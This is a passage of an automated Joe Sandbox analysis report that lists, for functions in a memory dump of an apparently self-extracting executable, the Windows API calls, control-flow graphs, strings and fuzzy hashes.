                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CreateErrorLast$Time
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1999340476-0
                                                                                                                                          • Opcode ID: 52cf9aadc4b8c53aaadef5c3bb215fe9096ee9cdaff19d391c4d58e5d4400506
                                                                                                                                          • Instruction ID: 7f59c13218e9b43f5a958fb4769170997911608bb1c93c065f84791f63a6438b
                                                                                                                                          • Opcode Fuzzy Hash: 52cf9aadc4b8c53aaadef5c3bb215fe9096ee9cdaff19d391c4d58e5d4400506
                                                                                                                                          • Instruction Fuzzy Hash: 5D310230544785AFE7309F29CD46BEABBD4BB04320F200B19F9A1A65D2D7B4A984CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1064 fabab-fabca GetClassNameW 1065 fabcc-fabe1 call f1fbb 1064->1065 1066 fabf2-fabf4 1064->1066 1071 fabe3-fabef FindWindowExW 1065->1071 1072 fabf1 1065->1072 1068 fabff-fac01 1066->1068 1069 fabf6-fabf9 SHAutoComplete 1066->1069 1069->1068 1071->1072 1072->1066
                                                                                                                                          APIs
                                                                                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 000FABC2
                                                                                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 000FABF9
                                                                                                                                            • Part of subcall function 000F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000EC116,00000000,.exe,?,?,00000800,?,?,?,000F8E3C), ref: 000F1FD1
                                                                                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 000FABE9
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                          • String ID: EDIT
                                                                                                                                          • API String ID: 4243998846-3080729518
                                                                                                                                          • Opcode ID: c4a8e3b034245714109854b8fbfcb6448538befa096a02a1282e61b2f1bd5728
                                                                                                                                          • Instruction ID: 82048e7c2acb2bb49d089c15ccc196c65194c24ac881e9f9906183285d76e396
                                                                                                                                          • Opcode Fuzzy Hash: c4a8e3b034245714109854b8fbfcb6448538befa096a02a1282e61b2f1bd5728
                                                                                                                                          • Instruction Fuzzy Hash: 47F0E27270022C7BDB3096649C0AFEB72AC9F43B10F480121BA04B30C0D760DA81C5B6
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1073 fdbde-fdc12 call fec50 SetEnvironmentVariableW call f0371 1078 fdc36-fdc38 1073->1078 1079 fdc14-fdc18 1073->1079 1080 fdc21-fdc28 call f048d 1079->1080 1083 fdc1a-fdc20 1080->1083 1084 fdc2a-fdc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                                                                          APIs
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000FDBF4
                                                                                                                                          • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000FDC30
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                          • String ID: sfxcmd$sfxpar
                                                                                                                                          • API String ID: 1431749950-3493335439
                                                                                                                                          • Opcode ID: 49bb4a9410e9d7777516f815b733d48e28448cd203736e2feb53e7601dea3ac0
                                                                                                                                          • Instruction ID: 783e1990c5f934848fa4c544427f8bea6b43d7932eac71557036bdf8a8a35b8a
                                                                                                                                          • Opcode Fuzzy Hash: 49bb4a9410e9d7777516f815b733d48e28448cd203736e2feb53e7601dea3ac0
                                                                                                                                          • Instruction Fuzzy Hash: 10F0A7B240422DB6DB211B948C06BFA3B99AF04B81B044412BE8596452D7F09980F6E0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1085 e9785-e9791 1086 e979e-e97b5 ReadFile 1085->1086 1087 e9793-e979b GetStdHandle 1085->1087 1088 e97b7-e97c0 call e98bc 1086->1088 1089 e9811 1086->1089 1087->1086 1093 e97d9-e97dd 1088->1093 1094 e97c2-e97ca 1088->1094 1091 e9814-e9817 1089->1091 1096 e97ee-e97f2 1093->1096 1097 e97df-e97e8 GetLastError 1093->1097 1094->1093 1095 e97cc 1094->1095 1098 e97cd-e97d7 call e9785 1095->1098 1100 e980c-e980f 1096->1100 1101 e97f4-e97fc 1096->1101 1097->1096 1099 e97ea-e97ec 1097->1099 1098->1091 1099->1091 1100->1091 1101->1100 1103 e97fe-e9807 GetLastError 1101->1103 1103->1100 1105 e9809-e980a 1103->1105 1105->1098
                                                                                                                                          APIs
                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 000E9795
                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 000E97AD
                                                                                                                                          • GetLastError.KERNEL32 ref: 000E97DF
                                                                                                                                          • GetLastError.KERNEL32 ref: 000E97FE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2244327787-0
                                                                                                                                          • Opcode ID: dc992ef3048ff4400ecb8652e619b81552e4e65937949cab040a96250134ae73
                                                                                                                                          • Instruction ID: 29a10c192b63abcc7a27dca640fadd46849e17512d1599b9e683af714e9c1fac
                                                                                                                                          • Opcode Fuzzy Hash: dc992ef3048ff4400ecb8652e619b81552e4e65937949cab040a96250134ae73
                                                                                                                                          • Instruction Fuzzy Hash: 9111C230914244EFDF709F27CA046AD77E8FB46360F108529F466A55A0DB708E88DB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,001040EF,00000000,00000000,?,0010ACDB,001040EF,00000000,00000000,00000000,?,0010AED8,00000006,FlsSetValue), ref: 0010AD66
                                                                                                                                          • GetLastError.KERNEL32(?,0010ACDB,001040EF,00000000,00000000,00000000,?,0010AED8,00000006,FlsSetValue,00117970,FlsSetValue,00000000,00000364,?,001098B7), ref: 0010AD72
                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0010ACDB,001040EF,00000000,00000000,00000000,?,0010AED8,00000006,FlsSetValue,00117970,FlsSetValue,00000000), ref: 0010AD80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                          • Opcode ID: 3dca129a6facf07d20bba7eae54440ba9a8a42531335c1e31ae4e290b5297871
                                                                                                                                          • Instruction ID: 0f200307a0c4e0674de6184b2f73c87242033842458e805d1ea4dc9c7ddc6d3e
                                                                                                                                          • Opcode Fuzzy Hash: 3dca129a6facf07d20bba7eae54440ba9a8a42531335c1e31ae4e290b5297871
                                                                                                                                          • Instruction Fuzzy Hash: 4E017B36211332ABC7258BB8DC44A97BFA8EF057A37514220F896D39D0C770C841C7E1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000EF2C5: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 000EF2E4
                                                                                                                                            • Part of subcall function 000EF2C5: GetProcAddress.KERNEL32(001281C8,CryptUnprotectMemory), ref: 000EF2F4
                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,000EF33E), ref: 000EF3D2
                                                                                                                                          Strings
                                                                                                                                          • CryptUnprotectMemory failed, xrefs: 000EF3CA
                                                                                                                                          • CryptProtectMemory failed, xrefs: 000EF389
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                          • API String ID: 2190909847-396321323
                                                                                                                                          • Opcode ID: c8a5ac41fa0dd60adb03e30e10a0493e7709948ce6c00c700c575d2e5f51fd98
                                                                                                                                          • Instruction ID: 720a4c8c21be6e089155e51ca183b0f14d4b8744ce2664ecb6b45dbd467a4b2e
                                                                                                                                          • Opcode Fuzzy Hash: c8a5ac41fa0dd60adb03e30e10a0493e7709948ce6c00c700c575d2e5f51fd98
                                                                                                                                          • Instruction Fuzzy Hash: C0117B31A016A6AFDF29AF32ED056BE3B94FF00750B108166FC057B292DB709F518780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 000F1043
                                                                                                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 000F108A
                                                                                                                                            • Part of subcall function 000E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E6C54
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                          • String ID: CreateThread failed
                                                                                                                                          • API String ID: 2655393344-3849766595
                                                                                                                                          • Opcode ID: ce8c8eaa98f8961519668eed75f6093ba2ad4a31b1027d0beebedb0951aeb04d
                                                                                                                                          • Instruction ID: a1a2ac7e57b4485a3d822f8417c3b721ae76b4430983b6794a56ddc05b658625
                                                                                                                                          • Opcode Fuzzy Hash: ce8c8eaa98f8961519668eed75f6093ba2ad4a31b1027d0beebedb0951aeb04d
                                                                                                                                          • Instruction Fuzzy Hash: 9D01F2B5344349BFD3349E24AD41BF6B399EB50750F20002EF68662681CEE2A8848228
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,000ED343,00000001,?,?,?,00000000,000F551D,?,?,?), ref: 000E9F9E
                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,000F551D,?,?,?,?,?,000F4FC7,?), ref: 000E9FE5
                                                                                                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,000ED343,00000001,?,?), ref: 000EA011
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileWrite$Handle
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4209713984-0
                                                                                                                                          • Opcode ID: 9fc36149faaa110d2b73667fe8745581a1bd9d9eb95b18df69d27afe27ead3d3
                                                                                                                                          • Instruction ID: 508c4376b0c5ea7db7b386e34cc9eaaa517d1c6c521f5ef4d76d997257f0e04c
                                                                                                                                          • Opcode Fuzzy Hash: 9fc36149faaa110d2b73667fe8745581a1bd9d9eb95b18df69d27afe27ead3d3
                                                                                                                                          • Instruction Fuzzy Hash: 2F31D331204385AFDB14CF21D908BAE77A5FF99711F04492DF981B7290C775AD88CBA2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000EC27E: _wcslen.LIBCMT ref: 000EC284
                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA2D9
                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA30C
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA329
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2260680371-0
                                                                                                                                          • Opcode ID: 1c248a0f13841886da58ecf144705c5e3273c532b7845d66ae3506389962fbe4
                                                                                                                                          • Instruction ID: cbf265fb3df0b7912b96eba988e37239991f651c663b67de70b68092f9e4d4e2
                                                                                                                                          • Opcode Fuzzy Hash: 1c248a0f13841886da58ecf144705c5e3273c532b7845d66ae3506389962fbe4
                                                                                                                                          • Instruction Fuzzy Hash: B101B531300294AEEF61AB774C09BFE32C89F0F780F048419F901F6092D754EB8186B2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0010B8B8
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Info
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1807457897-3916222277
                                                                                                                                          • Opcode ID: 3cb5c348a78b3a4158a645fcb550b8a60a5a5c37344ca0cf8ae51dd7c6f0bf5f
                                                                                                                                          • Instruction ID: f244ad5b06b52859d6b53aeee58a987223cdd9d00fe6d9d775393a56980aab55
                                                                                                                                          • Opcode Fuzzy Hash: 3cb5c348a78b3a4158a645fcb550b8a60a5a5c37344ca0cf8ae51dd7c6f0bf5f
                                                                                                                                          • Instruction Fuzzy Hash: 744119B050834C9EDF258E648CC4BF6BBA9EF55308F1404EDE6DA87182D3B59A45CF60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0010AFDD
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: String
                                                                                                                                          • String ID: LCMapStringEx
                                                                                                                                          • API String ID: 2568140703-3893581201
                                                                                                                                          • Opcode ID: fb806b940757bb2d300bea627e36e83752635f4eab587e5ffaeb0e9020d3d12d
                                                                                                                                          • Instruction ID: 9f6d2a51047b597357f69da148ec8e10701657d9062f00c3650fc66b3643d5bd
                                                                                                                                          • Opcode Fuzzy Hash: fb806b940757bb2d300bea627e36e83752635f4eab587e5ffaeb0e9020d3d12d
                                                                                                                                          • Instruction Fuzzy Hash: 6701083250420EBBCF06AF90DD06DEE7F66EF48764F458154FE14662A0CB728A71EB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0010A56F), ref: 0010AF55
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                                                                          • API String ID: 2593887523-3084827643
                                                                                                                                          • Opcode ID: 7e08ac157a64df94973d3b3b24936b79c9cb7f4d67987262c57ac4862d1e979d
                                                                                                                                          • Instruction ID: 36c787d848d0efdec8df78a15115eb36e29e791fdefa1c7c400e7a47e4806cbb
                                                                                                                                          • Opcode Fuzzy Hash: 7e08ac157a64df94973d3b3b24936b79c9cb7f4d67987262c57ac4862d1e979d
                                                                                                                                          • Instruction Fuzzy Hash: 1FF0B43168520CBBCF0A6F50CD06CED7F61EF54721B418064FD185A2A0DB714A509786
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Alloc
                                                                                                                                          • String ID: FlsAlloc
                                                                                                                                          • API String ID: 2773662609-671089009
                                                                                                                                          • Opcode ID: e29249e728fef4bfad7f5ea9c8ffe375d034a8cbe2ddf5633b04e372bc5b4fa9
                                                                                                                                          • Instruction ID: 76ce3b1f61e3a00cecb960dcb2c5b35c53d30629f39e8fe1d51073ce86d70a54
                                                                                                                                          • Opcode Fuzzy Hash: e29249e728fef4bfad7f5ea9c8ffe375d034a8cbe2ddf5633b04e372bc5b4fa9
                                                                                                                                          • Instruction Fuzzy Hash: F8E0553068431C7BC209ABA4CE069EEBBA4CF54730B4100A8FC01973C0CFB04E8082C6
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000FEAF9
                                                                                                                                            • Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
                                                                                                                                            • Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
